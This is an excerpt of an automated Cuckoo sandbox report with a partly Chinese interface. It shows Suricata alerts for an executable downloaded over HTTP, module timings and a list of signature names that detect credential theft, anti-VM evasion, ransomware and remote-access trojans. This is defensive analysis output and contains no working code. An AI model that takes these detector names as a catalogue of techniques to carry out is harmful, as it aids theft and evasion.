2023-01-27 12:52:32.668336+0800	112.45.33.153	808	192.168.122.201	49162	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2023-01-27 12:52:38.352435+0800	112.45.33.153	808	192.168.122.201	49166	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

抱歉! 没有任何文件投放。

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 22.227 seconds )

10.788 Suricata
5.877 NetworkAnalysis
2.77 VirusTotal
1.501 Static
0.525 TargetInfo
0.356 BehaviorAnalysis
0.308 peid
0.084 AnalysisInfo
0.012 Strings
0.004 config_decoder
0.002 Memory

Signatures ( 1.624 seconds )

1.351 md_url_bl
0.023 stealth_file
0.02 api_spamming
0.017 stealth_timeout
0.016 antiav_detectreg
0.016 infostealer_ftp
0.015 stealth_decoy_document
0.013 kovter_behavior
0.012 antiemu_wine_func
0.011 infostealer_browser_password
0.01 infostealer_im
0.009 infostealer_bitcoin
0.008 md_domain_bl
0.007 antiav_detectfile
0.006 anomaly_persistence_autorun
0.006 infostealer_mail
0.005 geodo_banking_trojan
0.005 ransomware_extensions
0.004 antivm_vbox_libs
0.004 antianalysis_detectreg
0.004 network_http
0.004 ransomware_files
0.003 mimics_filetime
0.003 reads_self
0.003 antivm_vbox_files
0.003 disables_browser_warn
0.003 maldun_malicious_drop_executable_file_to_temp_folder
0.002 tinba_behavior
0.002 bootkit
0.002 rat_nanocore
0.002 exec_crash
0.002 antivm_generic_disk
0.002 virus
0.002 browser_security
0.002 modify_proxy
0.002 md_bad_drop
0.001 network_tor
0.001 antiav_avast_libs
0.001 antivm_vmware_libs
0.001 maldun_anomaly_massive_file_ops
0.001 betabot_behavior
0.001 antisandbox_sunbelt_libs
0.001 antisandbox_sboxie_libs
0.001 antiav_bitdefender_libs
0.001 dyre_behavior
0.001 kibex_behavior
0.001 shifu_behavior
0.001 cerber_behavior
0.001 hancitor_behavior
0.001 antidbg_devices
0.001 antivm_parallels_keys
0.001 banker_zeus_mutex
0.001 bot_drive
0.001 bot_drive2
0.001 browser_addon
0.001 disables_system_restore
0.001 codelux_behavior
0.001 darkcomet_regkeys
0.001 malicous_targeted_flame
0.001 maldun_anomaly_commands
0.001 network_cnc_http

Reporting ( 0.496 seconds )

0.494 ReportHTMLSummary
0.002 Malheur


Task ID	717081
Mongo ID	63d359077e769a7a56f3f92c
Cuckoo release	1.4-Maldun